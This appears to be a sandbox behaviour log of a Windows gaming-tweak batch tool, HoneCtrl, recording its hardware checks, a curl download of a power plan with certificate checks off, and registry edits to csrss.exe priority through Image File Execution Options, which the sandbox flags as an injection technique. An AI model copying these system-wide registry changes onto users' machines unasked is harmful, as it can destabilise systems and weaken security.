C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:3012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:5096
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:1436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4648
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:1544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3776
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:2348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1660
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:4700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2492
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:3544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3788
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:3632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "6⤵PID:3772
-
-
C:\Windows\system32\find.exefind "N/A"6⤵PID:4028
-
-
C:\Windows\system32\curl.execurl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"6⤵PID:4304
-
-
C:\Windows\system32\powercfg.exepowercfg /d 44444444-4444-4444-4444-4444444444496⤵
- Power Settings
PID:1936
-
-
C:\Windows\system32\powercfg.exepowercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-4444444444496⤵
- Power Settings
PID:1400
-
-
C:\Windows\system32\powercfg.exepowercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."6⤵
- Power Settings
PID:4540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value6⤵PID:3264
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get numberOfCores /value7⤵PID:2548
-
-
-
C:\Windows\system32\powercfg.exepowercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 16⤵
- Power Settings
PID:4416
-
-
C:\Windows\system32\powercfg.exepowercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 06⤵
- Power Settings
PID:4592
-
-
C:\Windows\system32\powercfg.exepowercfg -setactive "44444444-4444-4444-4444-444444444449"6⤵
- Power Settings
PID:408
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:1292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:3340
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:2868
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:1200
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3440
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2376
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:2600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:4560
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:2560
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:5116
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:788
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4808
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:2840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:5076
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:2384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:3988
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:5080
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:4820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:3796
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:1820
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:3844
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:2232
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:872
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:1564
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:5092
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:1508
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:2564
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:4464
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:224
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:3656
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:2296
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:2140
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:3596
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:1116
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:116
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:3828
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:1228
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:3272
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:4652
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:560
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:1108
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:1204
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:1788
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:3936
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:2220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:3516
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:4700
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:4800
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:1728
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:2496
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:3788
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:3652
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:2968
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:4020
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:3056
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:2800
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:1220
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:3348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3560
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:4304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:676
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:4540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2364
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:3648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:5112
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:4416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4448
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:4752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1112
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:2228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4828
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:2868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4628
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:3332
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:4988
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d 5217772 /f6⤵PID:2580
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:3836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:1976
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:524
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:788
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3372
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2368
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:4504
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:3988
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:4932
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:4432
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3844
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:1372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:4268
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:3964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:3244
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:4576
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:2584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:1044
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:2952
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:3656
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:3688
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:984
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:1424
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4220
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:3248
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:576
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:2380
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4484
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:4724
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:3012
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:4580
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:1436
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:3084
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:1544
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:1644
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:2220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:4356
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:2492
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:4800
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:1432
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:2496
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:4412
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:2084
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:5084
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:4452
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:4588
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:700
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:2800
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:672
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:3080
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:4736
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:1936
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:1164
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:3740
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:3792
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:3264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:4592
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:2728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1076
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:1112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4048
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:4828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4796
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2976
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:456
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:2376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:5116
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:1720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3724
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:1956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4168
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:4560
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass /t Reg_DWORD /d "4" /f6⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4392
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority /t Reg_DWORD /d "3" /f6⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1820
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NoLazyMode" /t REG_DWORD /d "1" /f6⤵PID:2844
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "AlwaysOn" /t REG_DWORD /d "1" /f6⤵PID:4296
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f6⤵PID:5080
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f6⤵PID:3796
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:4432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:2232
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:2980
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:1564
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:544
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3380
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:4464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:2532
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:2952
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3656
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:4252
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2456
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:1116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:4248
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:4224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:2380
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:3088
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:4724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:2648
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:4580
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:1276
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:3084
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:460
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:1644
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3524
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:5060
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4356
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:1728
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1660
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:1616
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:2496
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:3532
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:2084
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:2388
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:5084
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:4376
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:4104
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:2800
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:1220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:3080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:3864
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:4368
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:4876
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:1164
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:5112
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:2364
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:4968
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:2052
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:408
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:2592
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:2728
-
-
